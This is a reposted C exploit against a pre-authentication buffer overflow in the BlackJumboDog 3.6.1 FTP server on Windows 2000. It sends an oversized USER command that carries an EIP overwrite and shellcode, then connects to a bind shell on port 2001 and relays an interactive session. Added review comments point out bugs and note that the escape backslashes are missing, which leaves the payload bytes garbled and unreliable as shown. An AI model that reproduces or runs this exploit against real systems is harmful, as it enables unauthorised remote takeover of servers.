信息来源:hk20.com
代码:
//**************************************************************************
// BlackJumboDog FTP Server Buffer Overflow Vulnerability
// Bind Shell Exploit for English Win2K SP4
// 27 Jul 2004
//
// BlackJumboDog is an integrated proxy server, web server and FTP server
// developed by SapporoWorks for Microsoft Windows platforms. BlackJumboDog
// version 3.6.1 is vulnerable to a buffer overflow in its FTP server. By
// sending an FTP request containing an overly long parameter string in the
// USER, PASS, RETR, CWD, XMKD, XRMD or various other commands, a remote
// attacker can cause a stack overflow, overwriting EIP, and could execute
// arbitrary code.
//
// This vulnerability is caused by an unsafe strcpy that copies the entire
// parameter of the user's FTP command to a stack buffer of 256 bytes.
// For example, if the user's FTP client issues the following command,
//
// USER xxxxxxxxxxxx
//
// The FTP command parameter "xxxxxxxxxxxx" will be copied to a 256 bytes
// buffer using strcpy. Hence, by crafting an FTP command with an overly long
// parameter, a remote attacker can trigger a stack overflow and execute
// arbitrary code. The attacker does not need to have a valid account on the
// FTP server since the overflow can be triggered before authentication using
// the USER command.
//
// This exploit code binds shell on port 2001 of a vulnerable BlackJumboDog
// FTP server.
//
// Advisory
// http://www.security.org.sg/vuln/bjd361.html
//
// Greetz: snooq, sk, and all guys at SIG^2 (www.security.org.sg)
//
//**************************************************************************
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment (lib,"ws2_32.lib")
// Request string sent to the FTP service as the USER command. Per the header
// comment, the server strcpy()s the command argument into a 256-byte stack
// buffer, which is what this oversized argument is built to exceed.
// NOTE(review): in this copy of the listing every "\x.." and "\r\n" escape has
// lost its backslash, so the literal as shown is plain ASCII text, not the
// bytes the original source encoded; treat the inline byte comments below as
// historical annotations rather than a description of what is actually sent.
unsigned char expBuf[] =
"USER "
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"
"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVV"
"WWWW"
"AAAABBBB"
"xEBx06x90x90"// call ebx lands here
"xD6x19x02x75"// this overwrites EIP (address of CALL EBX)
"x90x90x90x90"
"xEBx62x55x8BxECx51x56x57x8Bx5Dx08x8Bx73x3Cx8Bx74"
"x33x78x03xF3x8Bx7Ex20x03xFBx8Bx4Ex18x56x33xD2x8B"
"x37x03x75x08x33xDBx33xC0xACx85xC0x74x09xC1xCBx0C"
"xD1xCBx03xD8xEBxF0x3Bx5Dx0Cx74x0Bx83xC7x04x42xE2"
"xDEx5Ex33xC0xEBx17x5Ex8Bx7Ex24x03x7Dx08x66x8Bx04"
"x57x8Bx7Ex1Cx03x7Dx08x8Bx04x87x03x45x08x5Fx5Ex59"
"x8BxE5x5DxC3x55x8BxECx33xC9xB1xC8x2BxE1x32xC0x8B"
"xFCxF3xAAxB1x30x64x8Bx01x8Bx40x0Cx8Bx70x1CxADx8B"
"x58x08x89x5DxFCx68x8Ex4Ex0ExECxFFx75xFCxE8x70xFF"
"xFFxFFx83xC4x08xBBxAAxAAx6Cx6CxC1xEBx10x53x68x33"
"x32x2Ex64x68x77x73x32x5Fx54xFFxD0x89x45xF8xEBx35"
"x5Ex8Dx7DxF4x33xC9xB1x09xFFx36xFFx75xFCxE8x40xFF"
"xFFxFFx83xC4x08x85xC0x75x0Ex90xFFx36xFFx75xF8xE8"
"x2ExFFxFFxFFx83xC4x08x89x07x33xC0xB0x04x03xF0x2B"
"xF8xE2xD5xEBx29xE8xC6xFFxFFxFFx72xFExB3x16x35x54"
"x8AxA1xA4xADx2ExE9xA4x1Ax70xC7xD9x09xF5xADxCBxED"
"xFCx3BxEFxCExE0x60xE7x79xC6x79xADxD9x05xCEx54x6A"
"x02xFFx55xE0x33xC0x50x50x50x50x6Ax01x6Ax02xFFx55"
"xE4x89x45xD0x33xC0x50xB8xFDxFFxF8x2Ex83xF0xFFx50"
"x8BxC4x6Ax10x50xFFx75xD0xFFx55xE8x6Ax05xFFx75xD0"
"xFFx55xECx85xC0x75x68x8BxCCx6Ax10x8BxDCx33xC0x50"
"x50x53x51xFFx75xD0xFFx55xF0x8BxD0x5Bx83xF0xFFx74"
"x4Ex8BxFCx33xC9xB1x64x33xC0xF3xAAxC6x04x24x44x66"
"xC7x44x24x2Cx01x01x89x54x24x38x89x54x24x3Cx89x54"
"x24x40x8BxC4x8Dx58x44xB9xFFx63x6Dx64xC1xE9x08x51"
"x8BxCCx52x53x53x50x33xC0x50x50x50x6Ax01x50x50x51"
"x50xFFx55xF4x5Bx6AxFFxFFx33xFFx55xD4xFFx55xD8xFF"
"x75xD0xFFx55xD8x50xFFx55xDC"
"rn";
// Interactive relay between the local console and an already-connected
// socket: pending keyboard input is forwarded to the peer, and anything the
// peer sends is written to stdout. Returns only when select() fails; when the
// peer closes the connection (recv() <= 0) the whole process exits via
// exit(0), so the caller never gets control back on that path.
// Relies on the MSVC-only kbhit() from <conio.h>; exit()/strlen() are used
// without <stdlib.h>/<string.h>, so this builds only because <windows.h>
// pulls them in.
void shell(int sockfd)
{
    char buffer[1024];
    fd_set rset;
    FD_ZERO(&rset);
    for(;;)
    {
        // Only touch stdin when a key is already pending, so fgets() cannot
        // block the loop and starve the socket side.
        if(kbhit() != 0)
        {
            // NOTE(review): the fgets() return value is not checked. On EOF or
            // error `buffer` still holds whatever it contained before, and
            // that stale content is sent below. The send() result is also
            // ignored, so a short or failed write goes unnoticed.
            fgets(buffer, sizeof(buffer) - 2, stdin);
            send(sockfd, buffer, strlen(buffer), 0);
        }
        FD_ZERO(&rset);
        FD_SET(sockfd, &rset);
        // Poll with a 50 microsecond timeout so the loop can get back to
        // kbhit() quickly; Winsock ignores the first (nfds) argument of select().
        // `timeval` without the `struct` tag only compiles as C++.
        timeval tv;
        tv.tv_sec = 0;
        tv.tv_usec = 50;
        if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
        {
            // NOTE(review): this and the other messages in the file appear to
            // have lost the backslash of their "\n" escape in this copy.
            printf("select errorn");
            break;
        }
        if(FD_ISSET(sockfd, &rset))
        {
            int n;
            // Clearing the buffer is not needed for correctness: only the
            // first n bytes returned by recv() are written out.
            ZeroMemory(buffer, sizeof(buffer));
            if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
            {
                // 0 means the peer closed; SOCKET_ERROR (-1) means a failure.
                // Both end the process here without closing the socket or
                // calling WSACleanup().
                printf("EOFn");
                exit(0);
            }
            else
            {
                // Write exactly n bytes; the data is not NUL-terminated text.
                fwrite(buffer, 1, n, stdout);
            }
        }
    }
}
// Entry point. argv[1] is the target IPv4 address in dotted form.
// Flow: initialise Winsock 2.0, connect to TCP 21, print the banner, send
// expBuf, wait two seconds, then connect to TCP 2001 on the same host and hand
// that socket to shell().
// From a defender's point of view the header comment already gives the two
// observables: an unauthenticated USER command whose argument is far longer
// than the server's 256-byte buffer, followed by the service accepting a new
// inbound connection on port 2001, which it normally never listens on.
// Returns 0 on the normal path, 1 on usage/Winsock/FTP-side errors and -1 on
// errors while connecting to port 2001.
int main(int argc, char* argv[])
{
    WORD wVersionRequested;
    WSADATA wsaData;
    // NOTE(review): `sin` is never zeroed, so sin_zero stays uninitialised;
    // harmless for connect() but worth a `= {0}` in new code.
    struct sockaddr_in sin;
    int err;
    char inBuffer[10000];
    if(argc != 2)
    {
        // NOTE(review): the "\n" escapes in the messages of this file appear to
        // have lost their backslash in this copy of the listing.
        printf("Usage: %s <ip addr>n", argv[0]);
        return 1;
    }
    // Request Winsock 2.0 and insist on exactly that version.
    wVersionRequested = MAKEWORD(2,0);
    err = WSAStartup(wVersionRequested, &wsaData);
    if(err != 0)
    {
        printf("nWSAStartup Error.n");
        return 1;
    }
    if(LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 0)
    {
        printf("nWinsock Version Errorn");
        WSACleanup();
        return 1;
    }
    // NOTE(review): the WSASocket() result is not compared with
    // INVALID_SOCKET before use, unlike the socket() call further down.
    SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);
    // NOTE(review): inet_addr() returns INADDR_NONE for an unparsable
    // address; that value is not checked, so a bad argv[1] is only noticed
    // when connect() fails. The `(sockaddr *)` cast without `struct` is C++.
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(21);
    if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
    {
        int size;
        // read FTP banner
        // A single recv() is assumed to return the whole banner; a return of
        // 0 (peer closed) is not treated as an error and writes nothing.
        size = recv(s, inBuffer, sizeof(inBuffer), 0);
        if(size == SOCKET_ERROR)
        {
            // NOTE(review): the early returns in this branch skip
            // closesocket(s) and WSACleanup().
            printf("Error receiving FTP banner!n");
            return 1;
        }
        // Banner is written by length, not as a C string: inBuffer is never
        // NUL-terminated.
        fwrite(inBuffer, 1, size, stdout);
        if(send(s, (char *)expBuf, strlen((char *)expBuf), 0) == SOCKET_ERROR)
        {
            printf("Error sending exploit!n");
            return 1;
        }
        printf("Exploit Sent.n");
        // Fixed two-second delay before the second connection is attempted.
        Sleep(2000);
        //================================= Connect to the target ==============================
        SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
        if(sock == INVALID_SOCKET)
        {
            // NOTE(review): `s` is still open on this and the next error path.
            printf("Invalid socket return in socket() call.n");
            WSACleanup();
            return -1;
        }
        // Reuse `sin`; only the port changes, the address is re-parsed.
        sin.sin_family = AF_INET;
        sin.sin_port = htons(2001);
        sin.sin_addr.s_addr = inet_addr(argv[1]);
        if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
        {
            printf("Exploit Failed. SOCKET_ERROR return in connect call.n");
            closesocket(sock);
            WSACleanup();
            return -1;
        }
        // shell() either exit()s when the peer closes or returns after a
        // select() failure; on the latter path `sock` is never closed.
        shell(sock);
    }
    else
    {
        printf("Cannot connect!n");
    }
    closesocket(s);
    WSACleanup();
    return 0;
}